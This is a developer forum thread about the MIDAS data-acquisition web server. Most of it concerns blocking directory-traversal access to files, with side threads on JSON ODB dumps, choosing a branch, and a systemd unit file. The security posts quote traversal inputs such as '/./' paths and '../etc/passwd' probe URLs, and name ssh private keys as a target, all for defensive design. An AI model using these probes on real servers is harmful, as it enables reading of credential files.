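One caveat: realpath() also resolves the intentional symlinks proposed above, so the
prefix comparison would then have to be made against the symlink targets.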

Stefan
                      Reply  05 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> > - mhttpd cannot serve /etc/passwd by default as "/" is forbidden in file names added to /Custom/Path.
> You do this with a simple
> if (custom_path == "/")
> which does work but does not cover cases such as
> "/./"

Hmm... and this is just fine. Since I do not allow "/" in the file name, they can
set the resource path to any alias for the root filesystem, but they cannot
get to "/etc/passwd" unless they run mhttpd in /etc or set /Custom/Path to "/etc".

All these cases are not normal use of mhttpd, not "oops, I made a mistake"
and not "I will kludge my paths just for today just for this one experiment". They
have to make an explicit decision to break the security.

These days, I am thinking that we should not try to prevent all insecure uses of midas,
but at least we should make the default configuration secure and disallow some of the more
obviously insecure configurations (i.e. do not permit password protection without https).

Take the root password as an example. Empty root passwd is not permitted, but
root password set to "root" is allowed (some password tools may throw a warning).

>
> Still, in my opinion we should not have a path in the ODB. The custom path should be hard-wired and combined with symbolic links if necessary. The custom HTML pages under /Custom in the ODB have to be scanned for ".."s.
> 

Stefan, we already allow execution of arbitrary commands via ODB "/Programs/xxx/Start Command".

So for all practical purposes, somebody with access to the mhttpd web pages also has shell access
to the user account running mhttpd.

K.O.
                         Reply  05 Mar 2019, Stefan Ritt, Info, Gyrations of custom pages and ODB /Custom/Path 
> > > - mhttpd cannot serve /etc/passwd by default as "/" is forbidden in file names added to /Custom/Path.
> > You do this with a simple
> > if (custom_path == "/")
> > which does work but does not cover cases such as
> > "/./"
> 
> Hmm... and this is just fine. Since I do not allow "/" in the file name, they can
> set the resource path to any alias for the root filesystem, but they cannot
> get to "/etc/passwd" unless they run mhttpd in /etc or set /Custom/Path to "/etc".

Just set 

/Custom/Path = /./ 

which is allowed right now and then access etc/passwd, which translates to /./etc/passwd and then you get the password file. 

We should make up our mind:

1) We trust each user who has access to mhttpd. Then accessing /etc/passwd is not a problem and I don't understand all the fuss we had recently. Why all the recent work?

2) We do not trust users connected via mhttpd, but we trust users who can log in to the online machine. If we do not trust users having access to mhttpd, then it does not make sense in my mind to fix one hole and keep a few others open. You correctly 
mentioned the /Programs/xxx/Start command, and there are a few others, like executing scripts directly. Either we fix all (known) holes or we don't bother.

3) We do not trust users who can log in to the online machine, since they can just cat /etc/passwd. But then why give them access to the online machine?

So which of the three options would you prefer?

 
> All these cases are not normal use of mhttpd, not "oops, I made a mistake"
> and not "I will kludge my paths just for today just for this one experiment". They
> have to make an explicit decision to break the security.

Accessing /etc/passwd is an explicit decision as well and does not happen by "oops, I made a mistake"

> These days, I am thinking that we should not try to prevent all insecure uses of midas,
> but at least we should make the default configuration secure and disallow some of the more
> obviously insecure configurations (i.e. do not permit password protection without https).

Thanks to the nice public discussion here on the forum (and I still think this is the correct way to discuss these things), all forum subscribers are now aware of several security holes. So either they are evil, then we have to fix all (known) holes. Or we trust 
them, then we don't care.

> Stefan, we already allow execution of arbitrary commands via ODB "/Programs/xxx/Start Command".
> 
> So for all practical purposes, somebody with access to the mhttpd web pages also has shell access
> to the user account running mhttpd.

Agree. And this is on the same level as accessing /etc/passwd. So either we allow all of them or none of them. Something in between absolutely does not make sense to me.

To shorten the discussion: I think what we do right now does not make sense, but I do not insist of changing it. If people want it like that, fine with me. Just a waste of your time fixing the "/" path.

Stefan
                            Reply  05 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> Just set 
> /Custom/Path = /./ 
> which is allowed right now and then access etc/passwd, which translates to /./etc/passwd and then you get the password file.

Nope. http://localhost:8080/etc/passwd yields this error regardless of the value of /Custom/Path: MIDAS error: Invalid custom file name 'etc/passwd' contains '/' or '\'

> We should make up our mind:
> 1) We trust each user who has access to mhttpd. Then accessing /etc/passwd is not a problem and I don't understand all the fuss we had recently. Why all the recent work?

Stefan, "/etc/passwd" is a stand-in for "$HOME/.ssh/id_rsa". Surely stealing the ssh keys is a very bad thing.

> 2) We do not trust users connected via mhttpd, but we trust users who can log in to the online machine.
> If we do not trust users having access to mhttpd, then it does not make sense in my mind to fix one hole and keep a few others open.
> You correctly mentioned the /Programs/xxx/Start command, and there are a few others, like executing scripts directly. Either we fix all (known) holes or we don't bother.

I see a distinction between accessing a magic URL (a read-only operation) and a targeted attack (editing odb, etc).

In the first case, it's a script-kiddie "let's try http:blah/etc/passwd, http:blah/../etc/passwd, etc. Bingo!".

In the second case, if it's a targeted attack, forget about it. If an attacker wants in, they will get in. Have secure backups, etc.

Plus eventually we will restore the user access controls - read-only access, operator access (can start runs, edit history plots) and Q access. Only
this very last one would allow editing of ODB.

> 3) We do not trust users who can log in to the online machine, since they can just cat /etc/passwd. But then why give them access to the online machine?

ssh foo cat /etc/passwd is normal
http://foo/etc/passwd is not normal

> So which of the three options would you prefer?

I try to think simple:
if something worked yesterday and works today, let it be
if we add something new, it should not be obviously insecure

> 
> Thanks to the nice public discussion here on the forum (and I still think this is the correct way to discuss these things), all forum subscribers are now aware of several security holes.
> So either they are evil, then we have to fix all (known) holes. Or we trust  them, then we don't care.
> 

Here is the elephant in the room: mhttpd has never gone through a security audit. It is easy to find
security holes - buffer overflows can be easily found by "grep sprintf".

To me, this means that access to mhttpd always must be password-protected.

Password protection requires https.

The built-in mongoose https server is as safe as the mongoose library (probably yes) and the openssl library (yes-ish, see openbsd libressl)

The external apache https takes a few minutes to set up; as the "industry standard", it is trusted to be safe.
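
For reference, a minimal sketch of such an apache reverse-proxy configuration
(hostnames and certificate paths are examples only, not from this thread):

  <VirtualHost *:443>
      ServerName midas.example.org
      SSLEngine on
      SSLCertificateFile    /etc/ssl/certs/midas.example.org.crt
      SSLCertificateKeyFile /etc/ssl/private/midas.example.org.key
      # forward everything to mhttpd, which listens on localhost only
      ProxyPass        / http://localhost:8080/
      ProxyPassReverse / http://localhost:8080/
  </VirtualHost>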

>
> > Stefan, we already allow execution of arbitrary commands via ODB "/Programs/xxx/Start Command".
> This is on the same level as accessing /etc/passwd. So either we allow all of them or none of them. Something in between absolutely does not make sense to me.
>

Ok, we have identified our difference of opinion:

I think serving arbitrary files over http is a bad idea (on general principles)
and you think it is okay because there are other ways to get to those files.

Fair enough.

K.O.

P.S. Hmm... not fair enough.

I am now thinking about web-browser security -
suppose some kind of cross-site or cross-tab exploit comes out and suddenly
arbitrary web pages loaded from facebook.com (or worse) gain access
to the mhttpd web pages if both are open at the same time.

We may still be protected by obscurity and they presumably do not know how to change
things in odb, but I think it is a good idea to protect ourselves at least
against drive-by attacks (try http:blah/etc/passwd, try http:blah/../etc/passwd, etc,
replace /etc/passwd by some other secret file, try again - think ssh keys, etc).

K.O.
       Reply  14 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
I now understand Stefan's and Thomas's proposal a little bit better.

In my mind only one issue remains - when we say "we will serve files from directory X", how
do we prevent mhttpd from serving files outside this directory by using trick URLs containing ".."
and/or other gimmicks.

The code I currently put in mhttpd disallows multi-level URL path names (by rejecting names that contain the directory separator "/").

This has the effect of keeping the mhttpd URL space flat (without subdirectories).

http://localhost:8080/Status.html  <--- no multi level URLs like we used to have:
http://localhost:8080/CS/Custom.html <--- no more of these

Keeping the URL space restricted to one level is important if we do not want to defeat
the recent change to the mhttpd URL scheme - if mhttpd runs behind a proxy, without
a "Base URL" (which we just removed), we can only use relative URLs to navigate
between midas pages and if we permit multi-level URLs, it becomes hard to get
back to the status page without the ugly counting of ".." URL elements (which ugly and
brittle code we also just recently removed) (n.b. to navigate from CS/Custom.html
to the status page, one must redirect to "../Status.html").

But this whole beautiful cathedral falls apart from one valid use case: we want to serve "jsroot"
from a subdirectory called "jsroot" - this is how this package is packaged and we do not want
to mess with it just to make midas happy.

So at the least we must enable serving of multi-level URL path names to serve 3rd party packages.

The most trivial way out is to replace the URL check "/ is not permitted" with ".. is not permitted".
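
The corresponding check then becomes (sketch, illustrative name):

  #include <string>

  // Allow multi-level names such as "jsroot/scripts/JSRootCore.js", but
  // still reject anything containing ".." to block directory traversal.
  bool multi_level_name_ok(const std::string& name)
  {
     return name.find("..") == std::string::npos;
  }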

(One could also have a list of all permitted subdirectories in ODB, but this would be hard to use and 
difficult to implement. Not my favourite solution.)

This will break the flatness of the mhttpd URLs (no subdirectories). But maybe it is sufficient
to write down "do not do this!" and close with "wontfix" all bug reports about "my custom page
is at http://localhost:8080/mycustomdir/new/verynew/custom.html, how come the [status] button
does not take me back to the status page?".


K.O.

> Parsing all URLs in mhttpd to prevent /etc/passwd etc. from being returned is tricky, because people can use escape sequences etc. Therefore I think it is much better to restrict file access 
> on the file system level when opening a file. The only escape one could have there is "..", which can be tested easily. 
> 
> Therefore, I propose to restrict file access to two well-defined directories, which is one system directory and one user directory. The system directory should be defined via 
> $MIDASSYS/resources, and the user directory should be the experiment directory (as defined in exptab) followed by "resources". So if MIDASSYS equals to /usr/local/midas and the 
> experiment directory equals to /home/users/exp for example, we would only have these two directories (and of course the subdirectories within these) served by mhttpd:
> 
> $MIDASSYS/resources -> /usr/local/midas/resources
> <exptab>/resources -> /home/users/exp/resources
> 
> These directories should be hard-wired into mhttpd, and not go through an ODB entry, since otherwise one could manipulate the ODB entries (knowingly or unknowingly) and open a 
> back-door. 
> 
> If users need a more complex structure, they can put soft links into these directories.
> 
> The code which opens a resource file should then first evaluate $MIDASSYS, then add "/resources/", then add the requested file name, make sure that there is no ".." in the file name, 
> then open the file. If not existing, do the same for the <exptab>/resources/ directory.
> 
> This change will break most experiments, and forces people to move their custom pages to different directories, but I think it's the only clean solution and we just have to bite the 
> bullet.
> 
> Comments are welcome.
> 
> Stefan
          Reply  14 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> In my mind only one issue remains - when we say "we will serve files from directory X", how
> do we prevent mhttpd from serving files outside this directory by using trick URLs containing ".."
> and/or other gimmicks.
> 
> Disallow multi-level URL path names (by rejecting names that contain the directory separator "/").
> Replace the URL check "/ is not permitted" with ".. is not permitted".
> 

https://en.wikipedia.org/wiki/Directory_traversal_attack

K.O.
             Reply  14 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> > In my mind only one issue remains - when we say "we will serve files from directory X", how
> > do we prevent mhttpd from serving files outside this directory by using trick URLs containing ".."
> > and/or other gimmicks.
> > 
> > Disallow multi-level URL path names (by rejecting names that contain the directory separator "/").
> > Replace the URL check "/ is not permitted" with ".. is not permitted".
>
> https://en.wikipedia.org/wiki/Directory_traversal_attack

and, from Mitre's "Common Weakness Enumeration", with examples:

http://cwe.mitre.org/data/definitions/22.html

K.O.
          Reply  21 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> In my mind only one issue remains - when we say "we will serve files from directory X", how
> do we prevent mhttpd from serving files outside this directory by using trick URLs containing ".."
> and/or other gimmicks.
> 
> So at the least we must enable serving of multi-level URL path names to serve 3rd party packages.
> 
> The most trivial way out is to replace the URL check "/ is not permitted" with ".. is not permitted".
> 

This change is "in". commit https://bitbucket.org/tmidas/midas/commits/b231d10b5816c14428a69ee97b16f6fee7819367

mhttpd should be able to serve "jsroot" and other 3rd party packages now.

K.O.
    Reply  21 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> Before the days of javascript and ajax and web 2.0, MIDAS introduced "custom pages" for
> building graphical displays that could show "live" data from MIDAS and that could
> have buttons and controls to operate slow controls equipment, etc.

As summary of latest gyrations, this is how mhttpd can be used to serve custom pages:

a) old custom pages path:

?cmd=custom&page=XXX serves filename contained in ODB /Custom/XXX if it exists. Value of ODB /Custom/Path is prepended to the filename unless it already starts with a "/"

b) alternate custom pages path:

if ODB /Custom/URL or /Custom/URL& or /Custom/URL! exist, serves filename contained in corresponding ODB entry. Again value of ODB /Custom/Path is prepended to the filename 
unless it already starts with a "/".

In both cases, ".." is not permitted in the custom page name to avoid an ODB path traversal attack (escape from the /Custom subdirectory by using custom page names like "../System/blah").

c) new custom page path:

if ODB /Custom/Path exists and is not empty, it is prepended to the URL and this forms the filename (ODB[/Custom/Path] + "/" + URL). If this file exists, it is served. To prevent directory 
traversal attacks, ".." is not permitted in the URL.

d) resource search path:

file given by the URL is searched in the resource search path (see "resource paths" on the mhttpd help page, typically $MIDASSYS/resources, etc), e.g.
http://localhost:8080/status.html -> serves $MIDASSYS/resources/status.html.

this is the normal way to serve all standard midas web pages.

to (a) prevent directory traversal attack and (b) enforce flat namespace (no URL subdirectories), send_resource() disallows "/" (and "\" on Windows) anywhere in the filename.

Notes:

1) path traversal attacks are detailed here; MIDAS is subject to both filesystem and ODB path traversal attacks:
http://cwe.mitre.org/data/definitions/22.html

2) methods (c) and (d) are duplicative. In the next rework of mhttpd (update of mongoose library, update of multithreading,
update of web server configuration in ODB, etc), we will probably change serving of custom files along the lines
proposed by Stefan and Thomas.

3) the "old custom pages" code will most likely remain as is: it works with the new url scheme, it does not suffer from path traversal attacks and it is still used by some experiments.

K.O.
Entry  14 Mar 2019, Konstantin Olchanski, Info, switch to json odb dump format 
Regarding odb dumps saved into the midas output files, there are several
requests to make it possible to save odb in the json format.

Since 2019-02-12 commits
https://bitbucket.org/tmidas/midas/commits/ccaeeef4d6a1f0d91a67f2dc0a68105b7f6b77ae
and
https://bitbucket.org/tmidas/midas/commits/b3251587a68ef577919c81a221559e9af4dc8ae6

The format of the odb dump is specified by ODB
/Logger/Channels/0/Settings/ODB dump format (default is "json", was hardcoded as "xml").

The filename of the odb dump file saved at the end of run is specified by ODB
/Logger/ODB Last Dump File (default is "last.json", was hardcoded as "last.xml").

In addition, the following defaults have been changed, enabling LZ4 compression and CRC32C checksums by default:

/Logger/ODB dump file (new default is "run%05d.json", was "run%05d.odb")
/Logger/Channels/0/Settings/
Output "FILE"
Compress "lz4"
Checksum "CRC32C".

This brings mlogger default settings closer to what one would expect in the 21st century - "free" compression (LZ4)
and output file data integrity protected by checksums (CRC32C). These defaults are "free" in the sense that turning
them off would not noticeably improve the system performance. (Some users may want to enable better compression,
such as BZIP2 or PBZIP2 and better checksums, such as SHA256 or SHA512 - both choices that have significant CPU-use cost).

The default ODB dump format is now consistently "json" (vs the previous mix of XML and ODB formats).

Why "json" as the default? There has to be some default. The old ODB dump format is right out. Compared to XML,
JSON dump file size is smaller and the encoder is faster (important for reducing the time to start a run - where ODB dump is done twice). Tools for parsing 
JSON data are more widely available and "JSON has won in the marketplace". See also https://www.w3schools.com/js/js_json_xml.asp

Those who want to continue to use XML ODB dumps can trivially continue to do so by changing the settings listed above.
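For example, to switch everything back to XML, something along these lines should work (a sketch; the exact odbedit quoting may vary with your shell):

odbedit -c 'set "/Logger/Channels/0/Settings/ODB dump format" xml'
odbedit -c 'set "/Logger/ODB Last Dump File" last.xml'
odbedit -c 'set "/Logger/ODB dump file" run%05d.xml'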

In the rootana package, we have the XmlOdb class for parsing XML ODB dumps, but no matching JsonOdb class for parsing
JSON ODB data. This reminds me of difficulties working with XML data. I originally wrote the XmlOdb class using
the "libxml2" package. After discovering that many Linux distributions do not install this package by default, I switched
to the DOM and XML parsers from ROOT (since rootana is not very useful without ROOT anyway). Only to discover that
some binary ROOT distributions distributed by CERN exclude the XML parser from their default build.

I do intend to write the JsonOdb class for rootana, and I will probably do it using the mjson.{h,cxx} parser that I wrote
for MIDAS. (Lack of the JsonOdb class is the reason I did not switch MIDAS ODB dumps to JSON much earlier
than now. The camel's back was broken by the extra-slow run start time in the ALPHA-g DAQ system.)

K.O.
Entry  18 Jan 2019, Konstantin Olchanski, Info, bitbucket issue tracker "feature" 
It turns out the bitbucket issue tracker has a feature - I cannot make it automatically add me 
to the watcher list of all new issues.

So when you create a new issue, I think I get one message about it, and no more.

If there is some other activity on the issue (Stefan answers, Thomas answers),
I most definitely will not see any of it.

So in case you wondered why I sometimes completely do not react to some bug reports, this 
is why.

So much for "advanced" and "highly automated" and "intelligent" bug tracking.

K.O.
    Reply  14 Mar 2019, Konstantin Olchanski, Info, bitbucket issue tracker "feature" 
> It turns out the bitbucket issue tracker has a feature - I cannot make it automatically add me 
> to the watcher list of all new issues.
> 
> So when you create a new issue, I think I get one message about it, and no more.
> 

I retested this and I confirm that for new issues I am not a watcher "by default". If I reply to an issue,
the system enters an inconsistent state - it thinks I am a watcher, the best I can tell, but it also
says "0 watchers".

K.O.
Entry  02 Mar 2019, Pintaudi Giorgio, Forum, Best MIDAS branch/version for "production" 
Hello!
My name is Giorgio Pintaudi and I am a Ph.D. student at Yokohama National 
University (Japan). I also happen to be a T2K collaborator.
I am currently developing the DAQ software for a T2K near detector called WAGASCI 
(different from ND280) and we recently decided to adopt MIDAS as a user 
interface.
Now I am using the "develop" branch of the MIDAS BitBucket repository: I merge 
the remote repository every now and then with my local copy and that is fine ... 
but on the 25th of April our experiment is officially starting and I was 
wondering which version of MIDAS should I use for "production".
So my question is:
For a running experiment that needs software stability what branch of the MIDAS 
repository is better suited? The master branch or the develop branch? Moreover, 
what point in time do you think is more stable?
Best regards
Giorgio
    Reply  04 Mar 2019, Konstantin Olchanski, Forum, Best MIDAS branch/version for "production" 
Hi, Giorgio - you are asking excellent questions. I will try to answer them, but as ever, there are no 
easy answers.

In general, the top of the midas "develop" branch is "the best midas there is".

So for a new experiment, it is a reasonable place to start. Of course you can see
that there is quite a bit of commit activity going on, however, most substantial
changes are done on separate branches, where we try the new code, debug
it and test it. Only when the new code is "ready", we commit it to the "develop"
branch. Then, most often, we find some more last minute post-merge bugs,
and fix them right then and there on the head of the "develop" branch. Eventually
the dust settles and we have stable code that stays stable for a long time.

For example, right now we are waiting for the dust to settle on the change
of the MIDAS URL scheme, which was necessitated by needs of several experiments
that have more-complex-than-usual https proxy configurations. Unusual today,
but more common as we move forward, I think.

So if the head of the "develop" branch does not work for you, we encourage
that you file a bug report (here on this forum or on the bitbucket issue tracker).

While we try to sort out your problem, you can fall back to a previous version
of midas:

a) go back to one of the older "midas-YYYY-MM-X" tags
b) go back to one of the release candidate branches "feature/midas-YYYY-MM".
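For example (the tag and branch names below are hypothetical, just following the patterns above):

git checkout midas-2019-03-a          # a release tag
git checkout feature/midas-2019-03    # a release candidate branch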

But if you have an already running system and you already have a working
instance of MIDAS, you do not have to update it to the latest version
unless you need some newest feature or you suffer from a bug
that has been fixed in a newer version.

In general, I find that it is fairly safe to update a working instance of MIDAS to
the latest code. But do keep your old working copy, if there is trouble, you can
always go back to something that works.

Now to your questions:

> For a running experiment that needs software stability what branch of the MIDAS 
> repository is better suited?

easy to answer. the most stable is the version you are using right now (doh!). each time
you upgrade, there is a risk that something will go wrong.

if you start from scratch, use the head of the "develop" branch (the latest and greatest),
if you run into trouble, report the trouble and update to a newer version with your
trouble fixed, or go back in time to previous tags and release candidate branches (as I described 
above).

> The master branch or the develop branch?

the "develop" branch.

> Moreover, what point in time do you think is more stable?

I find that it is impossible to have a stable-stable-stable version of midas
because the rest of the world flows forward in time. Old versions of midas
stop compiling because of OS and compiler changes; they stop running
because of OS or web browser or hardware changes. Then somebody
always asks for new features and new or old bugs surface constantly.

But we try to mark some "good" spots using git tags and release branches,
however, the farther you go back in time, the more likely it is that the code will
not even compile anymore.


K.O.



> Hello!
> My name is Giorgio Pintaudi and I am a Ph.D. student at Yokohama National 
> University (Japan). I also happen to be a T2K collaborator.
> I am currently developing the DAQ software for a T2K near detector called WAGASCI 
> (different from ND280) and we recently decided to adopt MIDAS as a user 
> interface.
> Now I am using the "develop" branch of the MIDAS BitBucket repository: I merge 
> the remote repository every now and then with my local copy and that is fine ... 
> but on the 25th of April our experiment is officially starting and I was 
> wondering which version of MIDAS should I use for "production".
> So my question is:
> For a running experiment that needs software stability what branch of the MIDAS 
> repository is better suited? The master branch or the develop branch? Moreover, 
> what point in time do you think is more stable?
> Best regards
> Giorgio
       Reply  04 Mar 2019, Pintaudi Giorgio, Forum, Best MIDAS branch/version for "production" 
Hi Konstantin,
thank you for the very in-depth answer. Right now I am using the latest version of MIDAS (the head of the 
develop branch) and I have not noticed any bugs or problems in the MIDAS code, except the ones that I 
myself put in the part of the code that I am developing of course.
So I will do as you suggest and continue to use the head of the develop branch.
Thank you again for taking the time to answer all my questions!

PS other than the code peculiar to our experiment, I have made a little modification to the MIDAS install 
Makefile (I noticed that there is an "install" target but not an "uninstall" target so I wrote it).
If you are interested, I could make a merge request on BitBucket, just let me know.

Bests
Giorgio

> Hi, Giorgio - you are asking excellent questions. I will try to answer them, but as ever, there are no 
> easy answers.
> 
> In general, the top of the midas "develop" branch is "the best midas there is".
> 
> So for a new experiment, it is a reasonable place to start. Of course you can see
> that there is quite a bit of commit activity going on, however, most substantial
> changes are done on separate branches, where we try the new code, debug
> it and test it. Only when the new code is "ready", we commit it to the "develop"
> branch. Then, most often, we find some more last minute post-merge bugs,
> and fix them right then and there on the head of the "develop" branch. Eventually
> the dust settles and we have stable code that stays stable for a long time.
> 
> For example, right now we are waiting for the dust to settle on the change
> of the MIDAS URL scheme, which was necessitated by needs of several experiments
> that have more-complex-then-usual https proxy configurations. Unusual today,
> but more common as we move forward, I think.
> 
> So if the head of the "develop" branch does not work for you, we encourage
> that you file a bug report (here on this forum or on the bitbucket issue tracker).
> 
> While we try to sort out your problem, you can fall back to a previous version
> of midas:
> 
> a) go back to one of the older "midas-YYYY-MM-X" tags
> b) go back to one of the release candidate branches "feature/midas-YYYY-MM".
> 
> But if you have an already running system and you already have a working
> instance of MIDAS, you do not have to update it to the latest version
> unless you need some newest feature or you suffer from a bug
> that has been fixed in a newer version.
> 
> In general, I find that it is fairly safe to update a working instance of MIDAS to
> the latest code. But do keep your old working copy, if there is trouble, you can
> always go back to something that works.
> 
> Now to your questions:
> 
> > For a running experiment that needs software stability what branch of the MIDAS 
> > repository is better suited?
> 
> easy to answer. the most stable is the version you are using right now (doh!). each time
> you upgrade, there is a risk that something will go wrong.
> 
> if you start from scratch, use the head of the "develop" branch (the latest and greatest),
> if you run into trouble, report the trouble and update to a newer version with your
> trouble fixed, or go back in time to previous tags and release candidate branches (as I described 
> above).
> 
> > The master branch or the develop branch?
> 
> the "develop" branch.
> 
> > Moreover, what point in time do you think is more stable?
> 
> I find that it is impossible to have a stable-stable-stable version of midas
> because the rest of the world flows forward in time. Old versions of midas
> stop compiling because of OS and compiler changes; they stop running
> because of OS or web browser or hardware changes. Then somebody
> always asks for new features and new or old bugs surface constantly.
> 
> But we try to mark some "good" spots using git tags and release branches,
> however the more far you go back in time, the more likely the code will
> not even compile anymore.
> 
> 
> K.O.
> 
> 
> 
> > Hello!
> > My name is Giorgio Pintaudi and I am a Ph.D. student at Yokohama National 
> > University (Japan). I also happen to be a T2K collaborator.
> > I am currently developing the DAQ software for a T2K near detector called WAGASCI 
> > (different from ND280) and we recently decided to adopt MIDAS as a user 
> > interface.
> > Now I am using the "develop" branch of the MIDAS BitBucket repository: I merge 
> > the remote repository every now and then with my local copy and that is fine ... 
> > but on the 25th of April our experiment is officially starting and I was 
> > wondering which version of MIDAS should I use for "production".
> > So my question is:
> > For a running experiment that needs software stability what branch of the MIDAS 
> > repository is better suited? The master branch or the develop branch? Moreover, 
> > what point in time do you think is more stable?
> > Best regards
> > Giorgio
          Reply  05 Mar 2019, Konstantin Olchanski, Forum, Best MIDAS branch/version for "production" 
> 
> PS other than the code peculiar to our experiment, I have made a little modification to the MIDAS install 
> Makefile (I noticed that there is an "install" target but not an "uninstall" target so I wrote it).
> If you are interested, I could make a merge request on BitBucket, just let me know.
> 

Hmm... for most experiments, we do not "install" midas. I should probably remove the "install" target from the Makefile.

K.O.



> Bests
> Giorgio
> 
> > Hi, Giorgio - you are asking excellent questions. I will try to answer them, but as ever, there are no 
> > easy answers.
> > 
> > In general, the top of the midas "develop" branch is "the best midas there is".
> > 
> > So for a new experiment, it is a reasonable place to start. Of course you can see
> > that there is quite a bit of commit activity going on, however, most substantial
> > changes are done on separate branches, where we try the new code, debug
> > it and test it. Only when the new code is "ready", we commit it to the "develop"
> > branch. Then, most often, we find some more last minute post-merge bugs,
> > and fix them right then and there on the head of the "develop" branch. Eventually
> > the dust settles and we have stable code that stays stable for a long time.
> > 
> > For example, right now we are waiting for the dust to settle on the change
> > of the MIDAS URL scheme, which was necessitated by needs of several experiments
> > that have more-complex-then-usual https proxy configurations. Unusual today,
> > but more common as we move forward, I think.
> > 
> > So if the head of the "develop" branch does not work for you, we encourage
> > that you file a bug report (here on this forum or on the bitbucket issue tracker).
> > 
> > While we try to sort out your problem, you can fall back to a previous version
> > of midas:
> > 
> > a) go back to one of the older "midas-YYYY-MM-X" tags
> > b) go back to one of the release candidate branches "feature/midas-YYYY-MM".
> > 
> > But if you have an already running system and you already have a working
> > instance of MIDAS, you do not have to update it to the latest version
> > unless you need some newest feature or you suffer from a bug
> > that has been fixed in a newer version.
> > 
> > In general, I find that it is fairly safe to update a working instance of MIDAS to
> > the latest code. But do keep your old working copy, if there is trouble, you can
> > always go back to something that works.
> > 
> > Now to your questions:
> > 
> > > For a running experiment that needs software stability what branch of the MIDAS 
> > > repository is better suited?
> > 
> > easy to answer. the most stable is the version you are using right now (doh!). each time
> > you upgrade, there is a risk that something will go wrong.
> > 
> > if you start from scratch, use the head of the "develop" branch (the latest and greatest),
> > if you run into trouble, report the trouble and update to a newer version with your
> > trouble fixed, or go back in time to previous tags and release candidate branches (as I described 
> > above).
> > 
> > > The master branch or the develop branch?
> > 
> > the "develop" branch.
> > 
> > > Moreover, what point in time do you think is more stable?
> > 
> > I find that it is impossible to have a stable-stable-stable version of midas
> > because the rest of the world flows forward in time. Old versions of midas
> > stop compiling because of OS and compiler changes; they stop running
> > because of OS or web browser or hardware changes. Then somebody
> > always asks for new features and new or old bugs surface constantly.
> > 
> > But we try to mark some "good" spots using git tags and release branches,
> > however the more far you go back in time, the more likely the code will
> > not even compile anymore.
> > 
> > 
> > K.O.
> > 
> > 
> > 
> > > Hello!
> > > My name is Giorgio Pintaudi and I am a Ph.D. student at Yokohama National 
> > > University (Japan). I also happen to be a T2K collaborator.
> > > I am currently developing the DAQ software for a T2K near detector called WAGASCI 
> > > (different from ND280) and we recently decided to adopt MIDAS as a user 
> > > interface.
> > > Now I am using the "develop" branch of the MIDAS BitBucket repository: I merge 
> > > the remote repository every now and then with my local copy and that is fine ... 
> > > but on the 25th of April our experiment is officially starting and I was 
> > > wondering which version of MIDAS should I use for "production".
> > > So my question is:
> > > For a running experiment that needs software stability what branch of the MIDAS 
> > > repository is better suited? The master branch or the develop branch? Moreover, 
> > > what point in time do you think is more stable?
> > > Best regards
> > > Giorgio
             Reply  05 Mar 2019, Stefan Ritt, Forum, Best MIDAS branch/version for "production" 
> Hmm... for most experiments, we do not "install" midas. I should probably remove the "install" target from the Makefile.


... and change the documentation accordingly (Suzannah!?). Installing midas these days does not really make sense, since normally only one 
user uses it on a given machine.

Stefan
                Reply  06 Mar 2019, Pintaudi Giorgio, Forum, Best MIDAS branch/version for "production" 
> > Hmm... for most experiments, we do not "install" midas. I should probably remove the "install" target from the Makefile.
> 
> 
> ... and change the documentation accordingly (Suzannah!?). Installing midas these days does not really make sense, since normally only one 
> users uses it on a given machine.
> 
> Stefan

I understand. Anyway, I preferred to install MIDAS in the /opt/midas folder to remain consistent with the other programs that we are using for 
our experiment (Pyrame and Calicoes from LLR). I am also using Linux systemd to enable mhttpd on startup (and other handy features like auto-
restart after a crash) and unfortunately CentOS doesn't support enabling systemd units as a non-root user.
So in my particular case, perhaps it made some sense to install MIDAS in a folder other than the source code folder.
Giorgio
                   Reply  06 Mar 2019, Konstantin Olchanski, Forum, Best MIDAS branch/version for "production" 
> > > Hmm... for most experiments, we do not "install" midas. I should probably remove the "install" target from the Makefile.
>
> install MIDAS in the /opt/midas folder to remain consistent with the other programs that we are using for 
> our experiment (Pyrame and Calicoes from LLR).

I see. Would this work as well? Instead of "make install" do this:
su - root
cd /opt
git clone https://bitbucket.org/tmidas/midas   # (or "git pull" inside an existing checkout)
cd midas
make
add /opt/midas/linux/bin to your PATH. (is it time to get rid of the "linux" part from the default build path?!?)

> I am also using Linux systemd to enable mhttpd on startup

We use cron @reboot to start mhttpd.

But. CentOS7 systemd cron unit file has a bug and they run @reboot cron jobs before NIS and autofs is ready, see
http://www.triumf.info/wiki/DAQwiki/index.php/SLinstall#Enable_crontab_.40reboot_for_MIDAS_.28CentOS7.29
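For reference, a typical @reboot crontab entry looks something like this (a sketch; the experiment name and port are placeholders, and the "sleep" is a crude workaround for the boot-order problem above):

@reboot sleep 60; /opt/midas/bin/mhttpd -e <exptname> --http 8081 -D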

Can you post your systemd unit file to this elog, others may find it useful.

K.O.
                      Reply  06 Mar 2019, Pintaudi Giorgio, Forum, Best MIDAS branch/version for "production" 
> I see. Would this work as well? Instead of "make install" do this:
> su - root
> cd /opt
> git clone https://bitbucket.org/tmidas/midas   # (or "git pull" inside an existing checkout)
> cd midas
> make
> add /opt/midas/linux/bin to your PATH. (is it time to get rid of the "linux" part from the default build path?!?)

Got it. I will do that in the future.

> Can you post your systemd unit file to this elog, others may find it useful.

[Unit]
Description=MIDAS data acquisition system
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=3
User=neo
ExecStart=/opt/midas/bin/mhttpd -e WAGASCI --http 8081 --https 8444
Environment="MIDASSYS=/opt/midas" "MIDAS_EXPTAB=/home/neo/Code/WAGASCI/MIDAS/online/exptab" "MIDAS_EXPT_NAME=WAGASCI" 
"SVN_EDITOR=emacs -nw" "GIT_EDITOR=emacs -nw"
PassEnvironment=MIDASSYS MIDAS_EXPTAB MIDAS_EXPT_NAME SVN_EDITOR GIT_EDITOR

[Install]
WantedBy=multi-user.target
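To enable it (assuming the file is saved as /etc/systemd/system/mhttpd.service - the file name here is just a placeholder), run as root:

systemctl daemon-reload
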